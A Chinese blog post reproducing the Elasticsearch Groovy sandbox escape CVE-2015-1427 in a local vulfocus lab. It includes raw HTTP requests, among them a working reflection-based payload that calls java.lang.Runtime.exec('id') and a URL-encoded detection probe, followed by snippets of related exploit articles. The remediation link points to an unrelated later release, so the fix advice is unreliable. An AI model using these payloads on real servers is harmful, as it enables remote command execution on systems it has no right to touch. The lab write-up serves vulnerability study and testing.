ElasticSearch代码执行攻击 CVE-2015-1427 已亲自复现

最新推荐文章于 2024-08-11 13:41:03 发布
最新推荐文章于 2024-08-11 13:41:03 发布
阅读量879 收藏 7
点赞数 15
分类专栏: ElasticSearch漏洞合集 文章标签: elasticsearch 大数据 搜索引擎 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42430287/article/details/135202282
版权

ElasticSearch代码执行攻击 CVE-2015-1427 已亲自复现

漏洞名称

漏洞描述

Elasticsearch的Groovy脚本引擎在1.3.8之前和1.4.3之前,允许远程攻击者绕过沙箱保护机制,通过精心编制的脚本执行任意shell命令。

影响版本

Elasticsearch <= 1.3.7
Elasticsearch 1.4.0
Elasticsearch 1.4.1
Elasticsearch 1.4.2

漏洞复现

环境搭建

受害者IP:192.168.63.129:64008
攻击者IP:192.168.63.1

vulfocus下载链接

https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git

启动vulfocus

docker-compose up -d

环境启动后,访问http://192.168.63.129:64008即可看到一个ElasticSearch页面,说明已成功启动。
在这里插入图片描述

漏洞利用

访问/_search?pretty页面,返回该页面可能存在该漏洞。
在这里插入图片描述
访问/website/blog/路径,发送数据包,进行创建数据。

POST /website/blog/ HTTP/1.1
Host: 192.168.63.129:64008
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "test"
}

在这里插入图片描述
执行任意代码

POST /_search?pretty HTTP/1.1
Host: 192.168.63.129:64008
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

在这里插入图片描述

若进行漏洞探测,而不执行系统命令。响应体会返回一个字符串。

GET /_search?source=%7b%22size%22%3a1%2c%22query%22%3a%7b%22filtered%22%3a%7b%22query%22%3a%7b%22match_all%22%3a%7b%7d%7d%7d%7d%2c%22script_fields%22%3a%7b%22rikjbonmrfwqhxgpztcejleciqvgzb%22%3a%7b%22script%22%3a%22import+java.util.*%3b%5cnimport+java.io.*%3b%5cna%3d%5c%221%5c%22%3b%5cnif(a%3d%3d%5c%221%5c%22)%5cnreturn+%5c%22buxnjqnpgxclouohrsycttygdrdqpm%5c%22%2b%5c%22asxtjvqyonzndxfvlbgjqwmgtudlpy%5c%22%3b%22%7d%7d%7d&callback=jQuery111106033293346081683_1400563833509&_=1400563833510 HTTP/1.1
Host: 192.168.63.129:64008
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

在这里插入图片描述

修复建议

1.适用于Elasticsearch—LINUX AARCH64的安全更新
https://www.elastic.co/cn/downloads/past-releases/elasticsearch-8-3-3

总结

Bolgzhang
关注
专栏目录
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427)
limb0的博客
11-22 545
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427) 一、漏洞介绍 由于 Groovy 脚本引擎中的不明缺陷,远程 Web 服务器上托管的 Elasticsearch 应用程序受到远程代码执行漏洞的影响。未经认证的远程攻击者使用特别构建的请求可从沙盒逃逸并执行任意 Java 代码攻击成功可允许用户获取远程 shell 或操纵远程系统上的文件。 二、漏洞危害 ...
buuctf [ElasticSearch]CVE-2015-1427
qq_1873822的博客
03-24 569
漏洞描述 ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个 远程代码执行漏洞(CVE-2014-3120) ,漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。 Groovy语言“沙盒” ElasticSearch支持使用“在沙盒中的”Groovy语言
春秋云境:CVE-2015-1427[漏洞复现]
最新发布
如有错误感谢斧正
08-11 291
执行cat /flag命令,可以看到回显是Base64格式。执行whoami命令,可以看到响应体末尾已经出现回显。Payload:(上方双斜杠需要换成单斜杠)使用Yakit自带的Codec功能进行解码。
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 CVE-2015-1427 漏洞复现
ADummy的博客
02-24 873
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 ​ jre版本:openjdk:8-jre ​ elasticsearc
CVE-2015-1427 ElasticSearch(Groovy 沙盒绕过 && 代码执行漏洞)
weixin_51387754的博客
11-17 2675
漏洞简介 CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 漏洞原因很简单,由于沙盒代码黑名单中的Java危险方法不全,从而导致恶意用户仍可以使用反射的方法来执行Java代码。这就完了?当然不是!由于Elasticsearch开发团队没有完全认知Groovy的强大,以为仅仅防止用户调用Java反射就可以免于被攻击,这真是太好笑了,我们来看下Groovy对
ElasticSearch Groovy远程代码执行漏洞(CVE-2015-1427)POC
asdfghjkl978564的博客
04-17 458
ElasticSearch是一个JAVA开发的搜索分析引擎. 2014年爆出的(CVE-2014-3120),由于搜索引擎支持使用脚本代码(MVEL)作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意Java代码,后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。 这次轮到的Groovy,影响版本是...
CVE-2015-1427
weixin_34390105的博客
01-13 550
2019独角兽企业重金招聘Python工程师标准>>> ...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
利用Vulnhub复现漏洞 - ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)测试环境
JiangBuLiu的博客
07-02 1123
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)测试环境Vulnhub官方复现教程漏洞原理Groovy语言“沙盒”复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/ 漏洞原理 参考文章: http://...
利用Vulnhub复现漏洞 - ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境
JiangBuLiu的博客
07-02 1693
ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现head插件 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/ 漏洞原理 在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞...
【漏洞复现ElasticSearch命令执行漏洞 (CVE-2014-3120)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 780
Elasticsearch 是一个基于 Lucene 库的搜索引擎,具有 HTTP Web 接口和无模式 JSON 文档。Elasticsearch 是用 Java 开发的,其支持 MVEL、js、Java 等语言,其老版本默认语言为 MVEL。MVEL -一个被众多 Java 项目使用的开源的表达式语言。Elasticsearch 1.2之前的版本默认配置启用了动态脚本,该脚本允许远程攻击者通过 _search 的 source 参数执行任意 MVEL 表达式和 Java 代码。...
elasticsearch漏洞监测工具
09-17
elastiecsearch 的漏洞检测工具,对于elastiecsearch 在配置上或者版本上存在的问题有很好的检测和利用价值。
ElasticSearch 命令执行漏洞(CVE-2014-3120)
EnerY3的博客
12-12 850
Elasticsearch 命令执行漏洞(CVE-2014-3120),它允许攻击者通过发送精心构造的请求到 Elasticsearch 服务器来执行任意操作系统命令。这个漏洞存在于 Elasticsearch 的早期版本中,并且在较新的版本中已经被修复。
【学习笔记】ElasticSearch Groovy 脚本远程代码执行漏洞(CVE-2015-1427)
chualam的博客
11-01 398
ES旧版本中使用MVEL作为脚本执行引擎 没有安全限制 因此可以构造任意java代码 CVE -2014 -3120 出了这个CVE后 又用groovy引擎了 防止恶意脚本执行 还用了沙盒的机制(因为沙盒限制不严格导致漏洞) CVE-2015-1427 沙盒通过黑白名单检测可以说它是浅沙盒 如果黑名单禁用a() 白名单有b() 就用b()调用a() 通过一个类获取另一个类 通过getclass方法获取class对象反射调用类 替代品forname 利用它来调用java.lang.runtim
ElasticSearch远程代码执行漏洞复现(CVE-2014-3120/CVE-2015-1427)
谢公子的博客
11-07 2639
目录 CVE-2014-3120 CVE-2015-1427 CVE-2014-3120 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码复现环境:http://192.168.10.13:9200/ 漏洞利用:MSF search CVE-2014-3120,然后进入...
CVE-2015-1427(Groovy 沙盒绕过 && 代码执行漏洞)
浅笑996的博客
11-22 1954
1、vulhub环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 2、启动docker环境 cd vulhub-master/elasticsearch/CVE-2015-1427/ sudo docker-compose up 3、访问目标的9200,会出现Elasticsearch的信息: 新版本中Elastic...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法
weixin_33894992的博客
03-08 906
tang3 · 2015/03/07 14:170x00 漏洞概述要结合上一篇文章《ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427)》一起来看,我第一次知道CVE-2015-1427这个漏洞是在2月13日(春节放假前一天),但是当时想着过年,而且觉得应该是Groovy自身的问题,就也没太在意。知道前两天兰少(lupin)问我有没有看这个漏洞,说他找到了...
春秋云镜 CVE-2015-1427
qq_22002773的博客
09-14 235
春秋云镜 CVE-2015-1427
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值